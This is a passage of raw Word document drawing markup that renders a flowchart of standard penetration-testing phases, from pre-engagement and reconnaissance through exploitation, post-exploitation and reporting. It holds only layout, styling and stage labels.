                                <a:off x="3377109" y="835862"/>
                                <a:ext cx="2103120" cy="548640"/>
                              </a:xfrm>
                              <a:prstGeom prst="roundRect">
                                <a:avLst>
                                  <a:gd name="adj" fmla="val 34028"/>
                                </a:avLst>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:schemeClr val="accent1">
                                  <a:lumMod val="20000"/>
                                  <a:lumOff val="80000"/>
                                </a:schemeClr>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0B6183" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve">5. Exploitation </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:br/>
                                    <w:t>(Gaining Access, Establishing C2)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Rounded Rectangle 35"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="3287352" y="1716603"/>
                                <a:ext cx="2194560" cy="548640"/>
                              </a:xfrm>
                              <a:prstGeom prst="roundRect">
                                <a:avLst>
                                  <a:gd name="adj" fmla="val 34028"/>
                                </a:avLst>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:schemeClr val="accent1">
                                  <a:lumMod val="20000"/>
                                  <a:lumOff val="80000"/>
                                </a:schemeClr>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A898A9" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve">6. Post Exploitation </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:br/>
                                    <w:t>(Pivoting, Persistence, Exfiltration)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ounded Rectangle 36"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="3410768" y="2574905"/>
                                <a:ext cx="1920240" cy="548640"/>
                              </a:xfrm>
                              <a:prstGeom prst="roundRect">
                                <a:avLst>
                                  <a:gd name="adj" fmla="val 34028"/>
                                </a:avLst>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:schemeClr val="accent1">
                                  <a:lumMod val="20000"/>
                                  <a:lumOff val="80000"/>
                                </a:schemeClr>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F55C79" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve">7. Reporting </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:br/>
                                    <w:t>(Technical/ Executive reports)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 name="Straight Arrow Connector 37"/>
                            <wps:cNvCnPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="785374" y="572201"/>
                                <a:ext cx="0" cy="276225"/>
                              </a:xfrm>
                              <a:prstGeom prst="straightConnector1">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:ln w="3810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8" name="Straight Arrow Connector 38"/>
                            <wps:cNvCnPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="779764" y="1419283"/>
                                <a:ext cx="0" cy="276225"/>
                              </a:xfrm>
                              <a:prstGeom prst="straightConnector1">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:ln w="3810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9" name="Straight Arrow Connector 39"/>
                            <wps:cNvCnPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="751715" y="2305634"/>
                                <a:ext cx="0" cy="276225"/>
                              </a:xfrm>
                              <a:prstGeom prst="straightConnector1">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:ln w="3810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0" name="Straight Arrow Connector 40"/>
                            <wps:cNvCnPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="4341998" y="2294414"/>
                                <a:ext cx="0" cy="276225"/>
                              </a:xfrm>
                              <a:prstGeom prst="straightConnector1">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:ln w="3810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1" name="Straight Arrow Connector 41"/>
                            <wps:cNvCnPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="4336388" y="1441722"/>
                                <a:ext cx="0" cy="276225"/>
                              </a:xfrm>
                              <a:prstGeom prst="straightConnector1">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:ln w="3810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2" name="Elbow Connector 42"/>
                            <wps:cNvCnPr/>
                            <wps:spPr>
                              <a:xfrm flipV="1">
                                <a:off x="1733433" y="1133182"/>
                                <a:ext cx="1628775" cy="1743075"/>
                              </a:xfrm>
                              <a:prstGeom prst="bentConnector3">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:ln w="3810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6" name="Straight Arrow Connector 46"/>
                            <wps:cNvCnPr/>
                            <wps:spPr>
                              <a:xfrm flipV="1">
                                <a:off x="757325" y="3141497"/>
                                <a:ext cx="2165" cy="323897"/>
                              </a:xfrm>
                              <a:prstGeom prst="straightConnector1">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:ln w="3810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7" name="Straight Connector 47"/>
                            <wps:cNvCnPr/>
                            <wps:spPr>
                              <a:xfrm flipV="1">
                                <a:off x="757325" y="3427597"/>
                                <a:ext cx="3610803" cy="11417"/>
                              </a:xfrm>
                              <a:prstGeom prst="line">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:ln w="381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48" name="Straight Connector 48"/>
                            <wps:cNvCnPr/>
                            <wps:spPr>
                              <a:xfrm flipV="1">
                                <a:off x="4358827" y="3130277"/>
                                <a:ext cx="5141" cy="308115"/>
                              </a:xfrm>
                              <a:prstGeom prst="line">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:ln w="38100">
                                <a:solidFill>
                                  <a:srgbClr val="0070C0"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="1">
                                <a:schemeClr val="accent1"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:schemeClr val="accent1"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:schemeClr val="accent1"/>
                              </a:effectRef>
                              <a:fontRef idx="minor">
                                <a:schemeClr val="tx1"/>
                              </a:fontRef>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                        </wpg:grpSp>
                      </wpg:grpSp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
                <wp14:sizeRelH relativeFrom="margin">
                  <wp14:pctWidth>0</wp14:pctWidth>
                </wp14:sizeRelH>
                <wp14:sizeRelV relativeFrom="margin">
                  <wp14:pctHeight>0</wp14:pctHeight>
                </wp14:sizeRelV>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group id="Group 53" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:-.05pt;width:467.45pt;height:394.4pt;z-index:251659264;mso-position-horizontal-relative:margin;mso-width-relative:margin;mso-height-relative:margin" coordsize="54819,34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&#10;">
                <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                  <v:stroke joinstyle="miter"/>
                  <v:path gradientshapeok="t" o:connecttype="rect"/>
                </v:shapetype>
                <v:shape id="Text Box 52" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:18288;top:31919;width:17373;height:27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fF9MUA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKXqRuqtiW1FWkWBVvTbSlt0f2&#10;NQlm34bsNon/3hUEj8PMfMPMl72pREuNKy0reB5HIIgzq0vOFRzSz6c3EM4ja6wsk4IzOVguHgZz&#10;jLXt+IvaxOciQNjFqKDwvo6ldFlBBt3Y1sTB+7ONQR9kk0vdYBfgppKTKHqRBksOCwXW9FFQdkr+&#10;jYLfUf6zd/3m2E1n03q9bdPXb50qNXzsV+8gPPX+Hr61d1rBbALXL+EHyM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F8X0xQAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="1D04D61A" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="000125BF" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                        <w:pPr>
                          <w:rPr>
                            <w:color w:val="7030A0"/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="7030A0"/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>Lessons Learned/ Next Scope</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:group id="Group 51" o:spid="_x0000_s1028" style="position:absolute;width:54819;height:34653" coordsize="54819,346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shape id="Text Box 50" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:16941;top:19746;width:14631;height:274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xTLL4A&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/6HMEJvmlWoyNYopSp4reuhx2Ez3Szd&#10;TJadaFZ/fXMo9Ph439v96Dt1p0HawAaWiwIUcR1sy42Ba3Wab0BJRLbYBSYDDxLY76aTLZY2JP6k&#10;+yU2KoewlGjAxdiXWkvtyKMsQk+cue8weIwZDo22A6Yc7ju9Koq19thybnDY04ej+udy8wbkmFbF&#10;KOm5uVVOdOWb59chGfMyG9/fQEUa47/4z322Bl7z+vwl/wC9+w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1cUyy+AAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3ducmV2&#10;LnhtbFBLBQYAAAAABAAEAPUAAACDAwAAAAA=&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w14:paraId="5D96586B" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="000125BF" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                          <w:pPr>
                            <w:rPr>
                              <w:color w:val="7030A0"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="000125BF">
                            <w:rPr>
                              <w:color w:val="7030A0"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t>Move to Active Testing</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                  </v:shape>
                  <v:group id="Group 49" o:spid="_x0000_s1030" style="position:absolute;width:54819;height:34653" coordsize="54819,346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roundrect id="Rounded Rectangle 10" o:spid="_x0000_s1031" style="position:absolute;width:15525;height:5486;visibility:visible;mso-wrap-style:square;v-text-anchor:top" arcsize="22300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dJcAA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQW/CMAyF70j7D5EncaPpdkCoENA0bdKuA8TZakwT&#10;0Thdk7WFX48PSNxsvef3Pm92U2jVQH3ykQ28FSUo4jpaz42B4+F7sQKVMrLFNjIZuFKC3fZltsHK&#10;xpF/adjnRkkIpwoNuJy7SutUOwqYitgRi3aOfcAsa99o2+Mo4aHV72W51AE9S4PDjj4d1Zf9fzDQ&#10;rjwe/tLg8DZel3T0X2c8XYyZv04fa1CZpvw0P65/rOALvfwiA+jt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i/dJcAAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" fillcolor="#deeaf6 [660]" strokecolor="#0070c0" strokeweight="1pt">
                      <v:stroke joinstyle="miter"/>
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="6BCAEAD1" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00244A04">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t xml:space="preserve">1. Pre-engagement </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00244A04">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:br/>
                              <w:t xml:space="preserve">(Scope, </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00244A04">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>RoE</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>, Contract</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00244A04">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:roundrect>
                    <v:roundrect id="Rounded Rectangle 15" o:spid="_x0000_s1032" style="position:absolute;top:8358;width:20116;height:5487;visibility:visible;mso-wrap-style:square;v-text-anchor:top" arcsize="22300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h+vb8A&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H/g/hBP2NtMNFKmNMoYDX7Vlz0dzbYLN&#10;pWtiW/3rl8Fgb/fx/bziMLtOjDQE61nB6yoDQVx7bblVUJWfL1sQISJr7DyTgjsFOOwXTwXm2k98&#10;pvESW5FCOOSowMTY51KG2pDDsPI9ceIaPziMCQ6t1ANOKdx18i3LNtKh5dRgsKcPQ/X1cnMKuq3F&#10;8juMBh/TfUOVPTb4dVXqeTm/70BEmuO/+M990mn+Gn5/SQfI/Q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OWH69vwAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" fillcolor="#deeaf6 [660]" strokecolor="#0070c0" strokeweight="1pt">
                      <v:stroke joinstyle="miter"/>
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="629F4DFB" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t xml:space="preserve">2. Intelligence Gathering </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>(Foot printing, Reconnaissance)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:roundrect>
                    <v:roundrect id="Rounded Rectangle 16" o:spid="_x0000_s1033" style="position:absolute;top:17166;width:20116;height:5486;visibility:visible;mso-wrap-style:square;v-text-anchor:top" arcsize="22300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rgyr4A&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPPWvDMBDdC/kP4gLZGrkdjHGthFIa6JrEdD6ssyVi&#10;nVxLsZ38+qhQ6HaP93nVfnG9mGgM1rOCl20Ggrjx2nKnoD4fngsQISJr7D2TghsF2O9WTxWW2s98&#10;pOkUO5FCOJSowMQ4lFKGxpDDsPUDceJaPzqMCY6d1CPOKdz18jXLcunQcmowONCHoeZyujoFfWHx&#10;/BMmg/f5llNtP1v8vii1WS/vbyAiLfFf/Of+0ml+Dr+/pAPk7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6K4Mq+AAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3ducmV2&#10;LnhtbFBLBQYAAAAABAAEAPUAAACDAwAAAAA=&#10;" fillcolor="#deeaf6 [660]" strokecolor="#0070c0" strokeweight="1pt">
                      <v:stroke joinstyle="miter"/>
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="147F9258" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t xml:space="preserve">3. Threat Modeling </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>(STRIDE, DREAD, Risk Rating)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:roundrect>
                    <v:roundrect id="Rounded Rectangle 17" o:spid="_x0000_s1034" style="position:absolute;top:25917;width:17373;height:5486;visibility:visible;mso-wrap-style:square;v-text-anchor:top" arcsize="22300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ZFUb4A&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+C/6HMII3m64HlWqUZVHw6oM9D83YBJtJ&#10;t4lt9ddvFoS9zcf3nM1ucLXoqA3Ws4KPLAdBXHptuVJwvRxmKxAhImusPZOCJwXYbcejDRba93yi&#10;7hwrkUI4FKjAxNgUUobSkMOQ+YY4cTffOowJtpXULfYp3NVynucL6dByajDY0Jeh8n5+OAX1yuLl&#10;J3QGX/1zQVe7v+H3XanpZPhcg4g0xH/x233Uaf4S/n5JB8jt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HGRVG+AAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3ducmV2&#10;LnhtbFBLBQYAAAAABAAEAPUAAACDAwAAAAA=&#10;" fillcolor="#deeaf6 [660]" strokecolor="#0070c0" strokeweight="1pt">
                      <v:stroke joinstyle="miter"/>
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="7D1DEC9E" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t xml:space="preserve">4. Vulnerability Analysis </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>(Scanning, Manual Testing)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:roundrect>
                    <v:roundrect id="Rounded Rectangle 27" o:spid="_x0000_s1035" style="position:absolute;left:33771;top:8358;width:21031;height:5487;visibility:visible;mso-wrap-style:square;v-text-anchor:top" arcsize="22300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qP7MEA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPwWrDMBBE74X8g9hAb40cH9LgRjGlpJBr7dDzYm0s&#10;EWvlWqrt5OujQKHHYWbeMLtydp0YaQjWs4L1KgNB3HhtuVVwqj9ftiBCRNbYeSYFVwpQ7hdPOyy0&#10;n/iLxiq2IkE4FKjAxNgXUobGkMOw8j1x8s5+cBiTHFqpB5wS3HUyz7KNdGg5LRjs6cNQc6l+nYJu&#10;a7H+CaPB23Td0Mkezvh9Uep5Ob+/gYg0x//wX/uoFeSv8PiSfoDc3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j+zBAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" fillcolor="#deeaf6 [660]" strokecolor="#0070c0" strokeweight="1pt">
                      <v:stroke joinstyle="miter"/>
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="000B6183" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t xml:space="preserve">5. Exploitation </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>(Gaining Access, Establishing C2)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:roundrect>
                    <v:roundrect id="Rounded Rectangle 35" o:spid="_x0000_s1036" style="position:absolute;left:32873;top:17166;width:21946;height:5486;visibility:visible;mso-wrap-style:square;v-text-anchor:top" arcsize="22300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0i3cAA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE78L+h/AWvGm6LopUo8iisNdV8fxonk2w&#10;ealNbKu/fiMIHoeZ+YZZrntXiZaaYD0r+BpnIIgLry2XCo6H3WgOIkRkjZVnUnCnAOvVx2CJufYd&#10;/1G7j6VIEA45KjAx1rmUoTDkMIx9TZy8s28cxiSbUuoGuwR3lZxk2Uw6tJwWDNb0Y6i47G9OQTW3&#10;eLiG1uCju8/oaLdnPF2UGn72mwWISH18h1/tX63gewrPL+kHyN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e0i3cAAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" fillcolor="#deeaf6 [660]" strokecolor="#0070c0" strokeweight="1pt">
                      <v:stroke joinstyle="miter"/>
